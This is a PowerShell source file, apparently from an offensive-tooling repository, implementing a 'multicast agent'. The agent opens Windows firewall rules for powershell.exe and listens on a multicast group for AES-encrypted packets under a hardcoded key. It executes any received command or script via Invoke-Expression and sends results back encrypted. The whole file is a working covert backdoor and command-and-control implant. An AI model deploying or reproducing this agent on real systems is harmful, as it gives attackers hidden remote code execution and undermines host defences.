Files
rvrsh3ll-Misc-Powershell-Sc…/Start-MulticastAgent.ps1
T
2018-09-13 00:18:29 -04:00

154 lines
5.4 KiB
PowerShell

function Create-AesManagedObject($key, $IV) {
# https://gist.github.com/ctigeek/2a56648b923d198a6e60
$aesManaged = New-Object "System.Security.Cryptography.AesManaged"
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
if ($IV) {
if ($IV.getType().Name -eq "String") {
$aesManaged.IV = [System.Convert]::FromBase64String($IV)
}
else {
$aesManaged.IV = $IV
}
}
if ($key) {
if ($key.getType().Name -eq "String") {
$aesManaged.Key = [System.Convert]::FromBase64String($key)
}
else {
$aesManaged.Key = $key
}
}
$aesManaged
}
function Create-AesKey() {
$aesManaged = Create-AesManagedObject
$aesManaged.GenerateKey()
[System.Convert]::ToBase64String($aesManaged.Key)
}
function Encrypt-String($key, $unencryptedString) {
$bytes = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString)
$aesManaged = Create-AesManagedObject $key
$encryptor = $aesManaged.CreateEncryptor()
$encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length);
[byte[]] $fullData = $aesManaged.IV + $encryptedData
$aesManaged.Dispose()
[System.Convert]::ToBase64String($fullData)
}
function Decrypt-String($key, $encryptedStringWithIV) {
$bytes = [System.Convert]::FromBase64String($encryptedStringWithIV)
$IV = $bytes[0..15]
$aesManaged = Create-AesManagedObject $key $IV
$decryptor = $aesManaged.CreateDecryptor();
$unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);
$aesManaged.Dispose()
[System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0)
}
function Start-MulticastAgent {
[CmdletBinding()]
Param (
[Parameter(Mandatory = $false)]
[String]
[Net.IPAddress]$MultiCastGroup = "224.1.1.1",
[Parameter(Mandatory = $false)]
[Int]
$MultiCastPort = 51111,
[Parameter(Mandatory = $false)]
[Int]
$BindPort = 51112,
[Parameter(Mandatory = $false)]
[String]
$AgentID = "$env:computername",
[Parameter(Mandatory = $false)]
[String]
$FWRuleProgram = "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe"
)
New-NetFirewallRule -Program "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe" -Action Allow -Profile Domain, Private -DisplayName "PowerShell" -Description "PowerShell" -Direction Inbound
New-NetFirewallRule -Program "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe" -Action Allow -Profile Domain, Private -DisplayName "PowerShell" -Description "PowerShell" -Direction Outbound
#netsh advfirewall firewall add rule name="PowerShell" dir=in action=allow program="c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe" enable=yes
#netsh advfirewall firewall add rule name="PowerShell" dir=out action=allow program="c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe" enable=yes
# Decryption Key
$AESKey = "MXDLZ3Og/O3MhybYvS/T6yI9nLyrLajbm7IAfRDmiKM="
# Loop to listen for incoming data
while ($true) {
$udp_client = New-Object System.Net.Sockets.UdpClient
$udp_client.ExclusiveAddressUse = $False
$LocalEndPoint = New-Object System.Net.IPEndPoint([ipaddress]::Any,$MultiCastPort)
$udp_client.Client.SetSocketOption([System.Net.Sockets.SocketOptionLevel]::Socket, [System.Net.Sockets.SocketOptionName]::ReuseAddress,$true)
$udp_client.Client.Bind($LocalEndPoint)
$multicast_group = [IPAddress]::Parse($MultiCastGroup)
$udp_client.JoinMulticastGroup($multicast_group, 50)
$receivebytes = $udp_client.Receive([ref]$LocalEndPoint)
If ($receivebytes) {
$receive_data = ([text.encoding]::ASCII).GetString($receivebytes)
$udp_client.Close()
# Decrypt packet
$decrypted_data = Decrypt-String $AESKey $receive_data
# Parse Packet for ID
$ReceiveID = $decrypted_data.Split(";")[0]
$Command = $decrypted_data.Split(";")[1]
$Script = $decrypted_data.Split(";")[2]
if ($ReceiveID -eq $AgentID) {
if ($command) {
Write-Output "Executing a command"
$results = (Invoke-Expression -Command $Command -ErrorAction Stop 2>&1 | Out-String)
Write-Output $results
}
elseif ($script) {
Write-Output "Executing Script"
$results = (Invoke-Expression -Command $Script -ErrorAction stop 2>&1 |Out-String)
}
elseif ($Command -eq "ExitAgent") {
exit
}
$udp_client = new-Object System.Net.Sockets.UdpClient
$multicast_group = [IPAddress]$MultiCastGroup
$udp_client.JoinMulticastGroup($multicast_group, 50)
$enc = [system.Text.Encoding]::ASCII
$encrypted_data = Encrypt-String $AESKey $results
$encrypted_packet = $enc.GetBytes($encrypted_data)
$endpoint = New-Object Net.IPEndpoint([IPAddress]$MultiCastGroup,$MultiCastPort)
$udp_client.Connect($endpoint)
$udp_client.ttl = 255
Try {
$udp_client.Send($encrypted_packet,$encrypted_packet.Length)| Out-Null
}
Catch {
$ErrorMessage = $_.Exception.Message
$FailedItem = $_.Exception.ItemName
}
Finally {
$udp_client.Close()
$results = $null
}
}
}
}
}